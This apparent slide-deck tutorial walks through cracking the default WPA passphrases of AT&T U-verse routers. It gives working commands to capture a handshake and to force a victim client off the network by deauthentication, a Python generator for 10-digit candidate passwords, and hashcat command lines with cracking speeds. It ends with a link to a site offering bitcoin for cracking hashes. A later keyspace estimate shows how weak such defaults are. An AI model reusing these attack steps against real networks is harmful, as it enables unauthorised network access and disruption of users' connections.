Cracking AT&T U-verse Default WPA1/2 Passwords

Post on 25-Feb-2016


by Jason Wheeler

Awesome blog: http://blog.init6.me

Getting the Handshake

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First, see which Wi-Fi networks are in range. Start your wireless interface in monitor mode.

#airmon-zc start wlan0

#airodump-ng --encrypt wpa mon0

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>

Deauthenticate a client

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Where:
• -0 means deauthentication
• 5 is the number of deauths to send
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• mon0 is the interface name

WPA Handshake

Verify 4-way Handshake

PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)

The PTK is derived with a keyed-HMAC function, keyed with the PMK, over the two MAC addresses and the two nonces from the first two packets of the 4-way handshake.

Verify 4-way Handshake

The easy way......

#pyrit -r <FILENAME>.pcap analyze

Strip out the junk.

#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip

CAP-2-HCCAP

To turn your pcap file into a hashcat-plus friendly file, you can upload it to https://hashcat.net/cap2hccap/

CRACK!!

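Python Script

# 2wire.py: print every 10-digit string that has no digit repeated three times in a row.
# Written for Python 2 (xrange); on Python 3 use range() instead.
MAX_INT = 9999999999
# '000', '111', ... '999'
BAD_PATTERNS = {x * 3 for x in '0123456789'}

for number in xrange(MAX_INT):
    # Left-pad with zeros to a fixed width of 10 digits.
    int_string = str(number).rjust(10, '0')
    # Skip candidates containing a triple repeat.
    if any(pattern in int_string for pattern in BAD_PATTERNS):
        continue
    print(int_string)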

Hashcat-plus

$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0 <filename>.hccap --gpu-accel=160 --gpu-loops=1024

88,770 c/s real

or

$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1

114K c/s real
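Added example, not part of the original slides: it sizes the two candidate sets above (the filtered script output and the 10-digit mask) and converts the quoted rates into time to exhaust, which is the measure of how little protection a default 10-digit passphrase gives. The function names and the 16-character alphanumeric passphrase used for comparison are assumptions of this example.

```python
# Added example: keyspace and exhaustion-time estimate for the candidate
# sets described above. Rates are the ones quoted on the slides.
from itertools import product

WORDLIST_RATE = 88770    # c/s quoted for the piped wordlist run
MASK_RATE = 114000       # "114K c/s" quoted for the mask run


def count_no_triple(length, alphabet=10):
    """Count strings with no symbol repeated three times in a row."""
    if length == 0:
        return 1
    # run1 / run2: strings ending in a run of exactly 1 / exactly 2 symbols
    run1, run2 = alphabet, 0
    for _ in range(length - 1):
        run1, run2 = (run1 + run2) * (alphabet - 1), run1
    return run1 + run2


def brute_count(length, digits="0123456789"):
    """Exhaustive cross-check of count_no_triple, for small lengths only."""
    bad = [d * 3 for d in digits]
    return sum(1 for t in product(digits, repeat=length)
               if not any(b in "".join(t) for b in bad))


def hours_to_exhaust(keyspace, rate):
    return keyspace / float(rate) / 3600


def report():
    filtered = count_no_triple(10)   # what the filtered script emits
    full = 10 ** 10                  # what the ten-position ?d mask covers
    strong = 62 ** 16                # assumption: 16 random chars, [A-Za-z0-9]
    return {
        "filtered_candidates": filtered,
        "filtered_hours": hours_to_exhaust(filtered, WORDLIST_RATE),
        "mask_hours": hours_to_exhaust(full, MASK_RATE),
        "strong_years": hours_to_exhaust(strong, MASK_RATE) / 24 / 365,
    }


if __name__ == "__main__":
    for key, value in sorted(report().items()):
        print("%-20s %s" % (key, value))
```

Both default-style sets fall in roughly a day at the quoted rates, while the random 16-character passphrase stays out of reach by many orders of magnitude.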

Crack for Bitcoin.

http://www.hashbounty.net/bounties
